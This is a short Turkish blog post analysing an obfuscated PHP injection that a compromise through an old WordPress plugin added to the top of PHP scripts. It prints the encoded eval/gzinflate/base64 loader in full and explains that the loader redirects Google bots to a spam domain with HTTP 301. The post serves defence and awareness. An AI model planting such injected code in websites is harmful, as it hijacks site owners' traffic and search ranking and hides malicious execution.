Eski bir wordpress plug’in nin neden olduğu sızmada aşağıdaki kod php betiklerinin başına eklenmiş.

  $oO0="cr"."eat"."e_fun"."cti"."on";$o0O=@$oO0('$x','ev'.'al'.'("?>".gz'.'inf'.'late'.'( bas'.'e64'.'_de'.'co'.'de($x)));');@$o0O("s7EvyCjg5cpM0yguKSrIL9ZQiQ92DQpzDYpW9wgJCYgPBfLiHd1d/ULUY3WU8vPTc1KT8kuUNDWrebk4M1ITU1KLNJRAKvUN9QwVjA0MFXzzy1JTFAJSi3IT81LzSnIqlTStkdT65CcnlmTm51kpZJSUFBRb6euXl5frpSUmp+YmFmcb5+ZZmuol5+cCNaVkpgI11vJy2dsBAA==");

Koda baktığımızda Eval işlemini yapan fonksiyonun okunmasını zorlaştırmak için parçalandığı göze çarpıyor. eval fonksiyonu ise gz (Gnome Zip) ve ardından base64 ile kodlanmış PHP kodunu execute ediyor. Zararlı Kodu görmek içip eval’i iptal ederek kodu çalıştırdım:

echo gzinflate(base64_decode("s7EvyCjg5cpM0yguKSrIL9ZQiQ92DQpzDYpW9wgJCYgPBfLiHd1d/ULUY3WU8vPTc1KT8kuUNDWrebk4M1ITU1KLNJRAKvUN9QwVjA0MFXzzy1JTFAJSi3IT81LzSnIqlTStkdT65CcnlmTm51kpZJSUFBRb6euXl5frpSUmp+YmFmcb5+ZZmuol5+cCNaVkpgI11vJy2dsBAA=="));

Kodu çıktısı aşağıdaki gibi:

Görünüşe göre, zararlı arkadaş google bot’larını www.facemask3mn95.com adresine yönlendirmekte. Bu yönlendirmeyi ise “site kalıcı olarak şu adrese taşındı” manasına gelen HTTP 301 kodu ile yapması. Web ziyaretçi sayısında anormal düşüşler görürseniz bu tarz bir saldırıya maruz kalmış olabilirsiniz. Dikkatli olun.